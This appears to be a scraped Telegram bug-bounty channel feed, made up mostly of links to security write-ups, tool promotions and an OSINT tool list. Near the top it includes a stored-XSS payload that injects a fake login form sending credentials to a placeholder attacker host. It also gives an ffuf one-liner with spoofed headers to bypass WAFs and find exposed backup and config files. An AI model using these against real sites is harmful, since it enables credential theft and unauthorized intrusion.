🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
A payload to create a phishing page when you find an XSS vulnerability, such as stored XSS or DOM XSS:
'><script>document.write('<h3>Please login to continue</h3><form action=http://YOURIP:PORT/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
A bypass on GitLab’s Login Email Verification via OAuth ROPC flow.
https://medium.com/@cybxis/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96
🔖 Writeup-Miner: Stay Updated with Medium Feeds & Real-Time Alerts for Security Enthusiasts and Tech Researchers!
Writeup-Miner is a 👩💻 Python script that fetches new articles from Medium RSS feeds and stores them in 👩💻 MongoDB or a simple .txt file. Plus, it sends you instant notifications through 📱 Telegram or 📱 Discord!
Key Features:
🟢 Scrape Medium posts via RSS feeds
🟢 Store data in MongoDB or .txt format
🟢 Set custom filters to refine content
🟢 Get real-time notifications via Telegram or Discord
How to Use:
1. Install the tool:
git clone https://github.com/0xSpidey/writeup-miner.git
cd writeup-miner
pip install -r requirements.txt
2. Configure Telegram or Discord notifications:
python3 writeup-miner.py -t <Telegram Bot Token> -c <Telegram Chat ID> -m mongo
3. Sit back and get notified when new content is published!
👩💻 Example Command (Telegram):
python3 writeup-miner.py -t 123456789:ABCdefGhIJKlmnoPQRstuVWxYZ -c -987654321 -m mongo
🖥 Explore More Options & Usage:
Discover additional commands, filters, and options on our GitHub page👇
📱Github: 🔗Link
#CyberSecurity #WriteupMiner #Automation #MediumRSS #bugbountyTools #bugbounty
🔹 Share & Support Us 🔹
📱 Channel : @bugbounty_tech
Please do boost the channel so that you guys can enjoy other features.
Exploring Deserialization Attacks and Their Effects
https://haymiz.dev/security/2024/09/07/deserialization-attacks/
A very easy bug anyone can find: https://medium.com/@malikirtizameg/a-very-easy-bug-anyone-can-find-8d2b11a768c7?source=rss------bug_bounty-5
How to Find IDOR Vulnerabilities: A Guide for Bug Bounty Hunters and Developers: https://cyberw1ng.medium.com/how-to-find-idor-vulnerabilities-a-guide-for-bug-bounty-hunters-and-developers-3d2ba2a766f5?source=rss------bug_bounty-5
Automating the CORS Vulnerability Scan: https://angixblack.medium.com/automating-the-cors-vulnerability-scan-66d57752cc36?source=rss------bug_bounty-5
How I got 100$ bounty: https://medium.com/@mukkumukku110/how-i-got-100-bounty-b3dd58e82e00?source=rss------bug_bounty-5
Subdomain Takeovers for Beginners: https://medium.com/@hichamalmakroudi/subdomain-takeovers-for-beginners-a51ed74db543?source=rss------bug_bounty-5
🔖 JavaScript for hackers: Learn to think like a hacker
🖥 Book Details: 🔗Link
👤 Author: Gareth Heyes
#infosec #cybersecurity #hacking #pentesting #security #book #pentest #BugBounty #BugBountyBooks
🔹 Share & Support Us 🔹
💬 Channel : @Hide_Club
XSS lab: https://brutelogic.com.br/gym.php
https://brutelogic.com.br/gym.php?p=gitbook
30 levels
NUCLEI101 FOR BUG BOUNTY CHEATSHEET
Sun, 18 Jun 2023 17:07:46 GMT
https://medium.com/p/3eaf3c35b39
Read this book after the OWASP Top 10.
You will learn more vulnerabilities.
1 page in 1 day.
☄️TplMap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool.
🔗https://github.com/epinna/tplmap
[2,500$ Bug Bounty Write-Up] Remote Code Execution (RCE) via unclaimed Node package
https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643
Try this amazing FFUF one-liner that I mostly use to bypass WAFs and to get good, refined results for information disclosure bugs. You can use any wordlist:
ffuf -w seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u https://example.com/FUZZ -fc 400,401,402,403,404,429,500,501,502,503 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf,.js,.css,.zip,.bak,.old,.log,.json,.xml,.config,.env,.asp,.aspx,.jsp,.gz,.tar,.sql,.db -ac -c -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" -H "X-Forwarded-For: 127.0.0.1" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-Host: localhost" -t 100 -r -o results.json
First IDOR
Severity: critical 9-10
E.g.: example.com/parameter.aspx?id=4471
SQL Injection: https://medium.com/@adhikarisudip869/sql-injetion-f6f5f4291cbc?source=rss------bug_bounty-5
BugBounty platforms List: https://medium.com/@loyalonlytoday/bugbounty-platforms-list-ed3a5af3a8a2?source=rss------bug_bounty-5
Live Bug Bounty & Penetration Testing on Real Websites: Step-by-Step Guide (Part 1): https://medium.com/@shaikhminhaz1975/live-bug-bounty-penetration-testing-on-real-websites-step-by-step-guide-part-1-971ccc9b9587?source=rss------bug_bounty-5
Hunting for Corporate Accounts: Exploiting IDOR and Parameter Pollution in Web Applications: https://medium.com/@tusharpuri6/hunting-for-corporate-accounts-exploiting-idor-and-parameter-pollution-in-web-applications-1792294e0c48?source=rss------bug_bounty-5
XSS — Cross Site Scripting: https://medium.com/@codingboltacademy/xss-cross-site-scripting-65e1981817df?source=rss------bug_bounty-5
😈 [ Scott Sutherland @_nullbind ]
[BLOG] Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation
🔗 https://www.netspi.com/blog/technical-blog/network-pentesting/hijacking-sql-server-credentials-with-agent-jobs-for-domain-privilege-escalation/
🐥 [ tweet ]
Guide to Using Nuclei: https://medium.com/@learntheshell/guide-to-using-nuclei-9c37869be30e?source=rss------bug_bounty-5
7 free online #OSINT Tools
GHUNT - Google account info
Sherlock - nickname enumeration
Holehe - search accounts by email
Ignorant - search accounts by phone
Whois domain lookup
WhatsApp profile info
HudsonRock - email leaks lookup
osint.rocks
Tip by twitter.com/0xtechrock
@OsintGit
What a morning🫡
I started this channel last year under the name "BugBounty tips by cipherops.xyz".
It took me a total of 10 months to reach 1k subscribers, but I was happy when I saw that, and it took me just 1 month to get the next 500 subscribers.
All you need to do is just start😄
The best thing of this year..... 💓💓